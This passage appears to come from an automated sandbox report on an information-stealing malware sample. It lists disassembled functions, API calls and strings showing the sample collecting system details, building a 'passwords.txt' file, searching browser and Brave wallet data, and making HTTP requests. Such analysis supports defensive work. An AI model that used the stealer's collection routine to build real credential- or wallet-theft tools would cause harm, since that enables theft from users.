Part of subcall function 00410860: RegEnumKeyExA.KERNEL32(00000000,?,?,00428524,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041091E
Part of subcall function 00410860: wsprintfA.USER32 ref: 00410947
Part of subcall function 00410860: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410965
Part of subcall function 00410860: RegQueryValueExA.KERNEL32(?,01531E18,00000000,000F003F,?,00000400), ref: 00410995
Part of subcall function 00410860: lstrlen.KERNEL32(?), ref: 004109AA
Part of subcall function 00410860: RegQueryValueExA.KERNEL32(?,01531D28,00000000,000F003F,?,00000400,00000000,00421E41,?,00000000,?,004280F0), ref: 00410A2E

lstrlen.KERNEL32(00000000,00000000,?,00428534,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00416697

Part of subcall function 00415650: Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
Part of subcall function 00415650: CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
Part of subcall function 00415650: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743

Strings

Display Resolution: , xrefs: 00415F88
GUID: , xrefs: 00415ADC
Processor: , xrefs: 004161F9
Path: , xrefs: 00415C02
information.txt, xrefs: 004166B2
Local Time: , xrefs: 004160BA
Work Dir: In memory, xrefs: 00415C9C
[Processes], xrefs: 004164E7
Windows: , xrefs: 00415CEE
Cores: , xrefs: 00416287
MachineID: , xrefs: 00415A60
Computer Name: , xrefs: 00415E90
Keyboard Languages: , xrefs: 0041601B
Threads: , xrefs: 00416309
TimeZone: , xrefs: 0041613C
Version: , xrefs: 00415923
RAM: , xrefs: 0041638B
HWID: , xrefs: 00415B6F
User Name: , xrefs: 00415F0C
[Hardware], xrefs: 004161CA
AV: , xrefs: 00415DFD
VideoCard: , xrefs: 0041640D
Date: , xrefs: 004159E4
Install Date: , xrefs: 00415D6A
W, xrefs: 00416718
[Software], xrefs: 00416592

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InformationInitializeQueryValuelstrcpy$EnumLocalNameProcess32lstrlen$BlanketCapsCloseCurrentDeviceDevicesDisplayHandleInfoInitInstanceKeyboardLayoutListLogicalNextProcessorProxySecurityTimeVariantlstrcat$CharComputerDirectoryErrorFileFirstFreeGlobalLastLocaleMemoryModuleObjectProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $W$Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 1864629043-4117839003
Opcode ID: e8240602e7ad9623efc1e5c09f4a11ac2f66258fc61510e5e7399bf9964c59ea
Instruction ID: 803c3528c2f6da264819a3d7c940b04ffa2433250a49f127d099ce38e6074702
Opcode Fuzzy Hash: e8240602e7ad9623efc1e5c09f4a11ac2f66258fc61510e5e7399bf9964c59ea
Instruction Fuzzy Hash: A8921E71805249E9CB15E7A1C952BEEBBB85F29304F6440BFB50273182DE7C6B4CCA79

Uniqueness

Uniqueness Score: -1.00%

Function 0040D090 Relevance: 40.6, APIs: 22, Strings: 1, Instructions: 335
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,0152EAD8,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 0040D149
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040D1E2
RtlAllocateHeap.NTDLL(00000000), ref: 0040D1E9
lstrlen.KERNEL32(00000000,00000000), ref: 0040D296
lstrcat.KERNEL32(000000FF,0152F788), ref: 0040D2B0
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D2C3

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00411AA0: memset.MSVCRT ref: 00411AD5
Part of subcall function 00411AA0: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,004075E6,0040DC76), ref: 00411B06
Part of subcall function 00411AA0: HeapAlloc.KERNEL32(00000000,?,004075E6,0040DC76), ref: 00411B0D
Part of subcall function 00411AA0: wsprintfW.USER32 ref: 00411B1C
Part of subcall function 00411AA0: OpenProcess.KERNEL32(00001001,00000000), ref: 00411B7D
Part of subcall function 00411AA0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B8C
Part of subcall function 00411AA0: CloseHandle.KERNEL32(00000000), ref: 00411B93

lstrcat.KERNEL32(000000FF,00427A6C), ref: 0040D2D2
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D2E5
lstrcat.KERNEL32(000000FF,00427A70), ref: 0040D2F4
lstrcat.KERNEL32(000000FF,0152F728), ref: 0040D305
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D318
lstrcat.KERNEL32(000000FF,00427A74), ref: 0040D327
lstrcat.KERNEL32(000000FF,0152F698), ref: 0040D338
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D34B
lstrcat.KERNEL32(000000FF,00427A78), ref: 0040D35A
lstrcat.KERNEL32(000000FF,01531D70), ref: 0040D36A
lstrcat.KERNEL32(000000FF,00000000), ref: 0040D37D
lstrcat.KERNEL32(000000FF,00427A7C), ref: 0040D38C
lstrcat.KERNEL32(000000FF,00427A80), ref: 0040D39B
lstrlen.KERNEL32(000000FF), ref: 0040D3D3
memset.MSVCRT ref: 0040D428
DeleteFileA.KERNEL32(00000000), ref: 0040D458

Strings

passwords.txt, xrefs: 0040D3E6

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$HeapProcess$lstrlen$Filememset$AllocAllocateCloseCopyDeleteHandleOpenSystemTerminateTimewsprintf
String ID: passwords.txt
API String ID: 4049833551-347816968
Opcode ID: d387000265917b568817f1fcd2c2459dc7c0458e382306b92f0ffc660c2a8358
Instruction ID: 215b863f2430d563b93ca64cb16b4ae420a8412cb18fc12b55f4b5a4a6015adc
Opcode Fuzzy Hash: d387000265917b568817f1fcd2c2459dc7c0458e382306b92f0ffc660c2a8358
Instruction Fuzzy Hash: 55D17474900209ABCB04EBE4DC56BEEBB79AF19304F50452EF911B3291DF785A48CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00414650 Relevance: 39.6, APIs: 11, Strings: 11, Instructions: 1136
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414861
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004148F6

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00413D40: StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0042248F), ref: 00413DB5

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414A37
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414ACC
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414C19
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414CBB
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414DFC
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414E91
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414FDE
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415073
Sleep.KERNEL32(0000EA60), ref: 00415082

Part of subcall function 00413EA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F37
Part of subcall function 00413EA0: lstrlen.KERNEL32(00000000), ref: 00413F4E
Part of subcall function 00413EA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00413F7A
Part of subcall function 00413EA0: lstrlen.KERNEL32(00000000), ref: 00413F8F
Part of subcall function 00413EA0: lstrlen.KERNEL32(00000000), ref: 00413FAC

Strings

ERROR, xrefs: 00414853
ERROR, xrefs: 00414C08
ERROR, xrefs: 004148E8
ERROR, xrefs: 00414ABE
ERROR, xrefs: 00414CAA
ERROR, xrefs: 00414DEE
ERROR, xrefs: 00414E83
), xrefs: 0041561D
ERROR, xrefs: 00415065
ERROR, xrefs: 00414FCD
ERROR, xrefs: 00414A29

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: )$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-1563971337
Opcode ID: 19e96281626953c1a908ccdd9ae1c3c26a2b4c0d6237b4cad89262f2261f7a75
Instruction ID: 16c706f6c4dd8a9781f8db293bfe0d0ce14ffdf2baf3511eb8db9a0682d00a07
Opcode Fuzzy Hash: 19e96281626953c1a908ccdd9ae1c3c26a2b4c0d6237b4cad89262f2261f7a75
Instruction Fuzzy Hash: DFA26F70C01248EACB15EBB5C9567DDBBB85F19308F5440BEE90573282EF78574CCAAA

Uniqueness

Uniqueness Score: -1.00%

Function 004074E0 Relevance: 32.1, APIs: 21, Instructions: 578
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004100F0: StrCmpCA.SHLWAPI(?,00000000,?,00407516,0152F7F8,?,00000000,?), ref: 004100FA

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,0152EAD8,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 004075BF
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040787E
lstrcat.KERNEL32(000000FF,00000000), ref: 004079D1
lstrcat.KERNEL32(000000FF,00427AAC), ref: 004079E0
lstrcat.KERNEL32(000000FF,00000000), ref: 004079F3
lstrcat.KERNEL32(000000FF,00427AB0), ref: 00407A02
lstrcat.KERNEL32(000000FF,00000000), ref: 00407A15
lstrcat.KERNEL32(000000FF,00427AB4), ref: 00407A24
lstrcat.KERNEL32(000000FF,00000000), ref: 00407A37
lstrcat.KERNEL32(000000FF,00427AB8), ref: 00407A46
lstrcat.KERNEL32(000000FF,00000000), ref: 00407A59
lstrcat.KERNEL32(000000FF,00427ABC), ref: 00407A68
lstrcat.KERNEL32(000000FF,00000000), ref: 00407A7B
lstrcat.KERNEL32(000000FF,00427AC0), ref: 00407A8A
lstrcat.KERNEL32(000000FF,00000000), ref: 00407AD1
lstrcat.KERNEL32(000000FF,00427AC4), ref: 00407AEE
lstrlen.KERNEL32(000000FF), ref: 00407B56
lstrlen.KERNEL32(000000FF), ref: 00407B65
RtlAllocateHeap.NTDLL(00000000), ref: 00407885

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00411AA0: memset.MSVCRT ref: 00411AD5
Part of subcall function 00411AA0: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,004075E6,0040DC76), ref: 00411B06
Part of subcall function 00411AA0: HeapAlloc.KERNEL32(00000000,?,004075E6,0040DC76), ref: 00411B0D
Part of subcall function 00411AA0: wsprintfW.USER32 ref: 00411B1C
Part of subcall function 00411AA0: OpenProcess.KERNEL32(00001001,00000000), ref: 00411B7D
Part of subcall function 00411AA0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B8C
Part of subcall function 00411AA0: CloseHandle.KERNEL32(00000000), ref: 00411B93

memset.MSVCRT ref: 00407BBF
DeleteFileA.KERNEL32(00000000,?,?,?,00427A73), ref: 00407BE7

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$HeapProcesslstrlen$Filememset$AllocAllocateCloseCopyDeleteHandleOpenSystemTerminateTimewsprintf
String ID:
API String ID: 2944411387-0
Opcode ID: d4dcf801c1ccb8dc7afc10bd14a435ef26f06da443b6dd9848c5a20a7ad679ae
Instruction ID: 3ca0864eb58e8f8aa976caedcdd73096d5702bd7c96c1b3cb961cac798526b89
Opcode Fuzzy Hash: d4dcf801c1ccb8dc7afc10bd14a435ef26f06da443b6dd9848c5a20a7ad679ae
Instruction Fuzzy Hash: 99327371804149EBCB14EBA5DC55BEEBB78AF19308F14416EF90273282DF786A48CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00412420 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 323stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00412466
lstrcpy.KERNEL32(?,00000000), ref: 004124F3
lstrcpy.KERNEL32(?,00000000), ref: 00412530
lstrcpy.KERNEL32(?,00000000), ref: 00412579
lstrcpy.KERNEL32(?,00000000), ref: 004125C2
lstrcpy.KERNEL32(?,00000000), ref: 0041260A
StrCmpCA.SHLWAPI(00000000,true,?), ref: 00412795
strtok_s.MSVCRT ref: 00412822

Strings

true, xrefs: 0041278F
false, xrefs: 004127AF

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s
String ID: false$true
API String ID: 2610293679-2658103896
Opcode ID: f6ac08726d2066c4f41ab0cdafdfe6cf974318efcda379675c1cab0782c83bd4
Instruction ID: 9550d4ec349f4b6986a081b59543f2dd3f4438588e0d90f2a146262d3da5c6a3
Opcode Fuzzy Hash: f6ac08726d2066c4f41ab0cdafdfe6cf974318efcda379675c1cab0782c83bd4
Instruction Fuzzy Hash: 42C1F97590010ABFCF14EBA4DC91EDEB779AF04308F10815EF606A7282DE785788CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405A30 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 200networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AA8
StrCmpCA.SHLWAPI(?,0152F518,?,?,?,?,?,?,00000004), ref: 00405AC0
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AE4
HttpOpenRequestA.WININET(00000000,GET,?,01532148,00000000,00000000,-00400100,00000000), ref: 00405B1B
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B3F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405B4A
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405B68
InternetReadFile.WININET(00000000,?,000007CF,00420429), ref: 00405BB5

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

InternetReadFile.WININET(00000000,?,000007CF,00420429), ref: 00405C0B
InternetCloseHandle.WININET(00000000), ref: 00405C16
InternetCloseHandle.WININET(?), ref: 00405C20
InternetCloseHandle.WININET(00000000), ref: 00405C2A

Strings

GET, xrefs: 00405B15
ERROR, xrefs: 00405B75
ERROR, xrefs: 00405C7E

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequestlstrlen$ConnectCrackInfoOptionQuerySendlstrcat
String ID: ERROR$ERROR$GET
API String ID: 1851261701-2509457195
Opcode ID: 15ebeb7ce850c2c06f64e6e6030b466563c2135e3a8808b05562186de4ed6fb0
Instruction ID: 735b7a5339effcfe679080928f79d8b6525980b66e78d205f4b2077015f7fe3f
Opcode Fuzzy Hash: 15ebeb7ce850c2c06f64e6e6030b466563c2135e3a8808b05562186de4ed6fb0
Instruction Fuzzy Hash: 5661B171900219AFEB10DB94CC85FEFB7BDEB49704F50412AFA05B3281DB785E488BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404B90 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 194networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00000000), ref: 00404BEB
RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00000000), ref: 00404BF2
InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C10
StrCmpCA.SHLWAPI(?,0152F518,?,?,?,?,?,?,00000000), ref: 00404C26
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404C51
HttpOpenRequestA.WININET(00000000,GET,?,01532148,00000000,00000000,-00400100,00000000), ref: 00404C8B
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404CB0
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404CC2
HttpQueryInfoA.WININET(000000FF,00000013,?,?,00000000), ref: 00404CE4
InternetReadFile.WININET(000000FF,?,00000400,00000001), ref: 00404D54
InternetCloseHandle.WININET(00000000), ref: 00404D85
InternetCloseHandle.WININET(00000000), ref: 00404D8F
InternetCloseHandle.WININET(?), ref: 00404D99

Strings

GET, xrefs: 00404C85

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET
API String ID: 442264750-1805413626
Opcode ID: d4ae02a6c4690c3aaa6e6b6f4ff710bfbdec9f819835c47ab5a961fe980701e1
Instruction ID: e4d9ae68b354d6a53ac565d60b82c8593cc119c1dcfd6e68e0806bb865507591
Opcode Fuzzy Hash: d4ae02a6c4690c3aaa6e6b6f4ff710bfbdec9f819835c47ab5a961fe980701e1
Instruction Fuzzy Hash: 486171B5A00219ABDB20DBA4DC45FEFB7B9EB49B10F504129FA05F72C0D7789904CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D607 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 365fileCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00427BE0), ref: 0040D61C
StrCmpCA.SHLWAPI(?,00427BE4), ref: 0040D636

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00427BE8,?,?,00427A9E), ref: 0040D6E7
StrCmpCA.SHLWAPI(00000000,Brave,00000000,?,0152F7C8,?,00427C0C,?,0152F638,?,00427C08,00000000,?,?,?,00427BE8), ref: 0040D8F0
StrCmpCA.SHLWAPI(?,Preferences), ref: 0040D90A
StrCmpCA.SHLWAPI(?,01531E48), ref: 0040DADF
StrCmpCA.SHLWAPI(?,0152F7C8), ref: 0040DB65
StrCmpCA.SHLWAPI(00000000,0152F638), ref: 0040DB7F

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 0040D090: CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 0040D149

FindNextFileA.KERNEL32(00000000,?), ref: 0040E128
FindClose.KERNEL32(00000000), ref: 0040E137

Strings

\BraveWallet\Preferences, xrefs: 0040D9E4
Opera GX, xrefs: 0040D6D6
Brave, xrefs: 0040D8DF
Preferences, xrefs: 0040D8FE
F, xrefs: 0040E179

Memory Dump Source

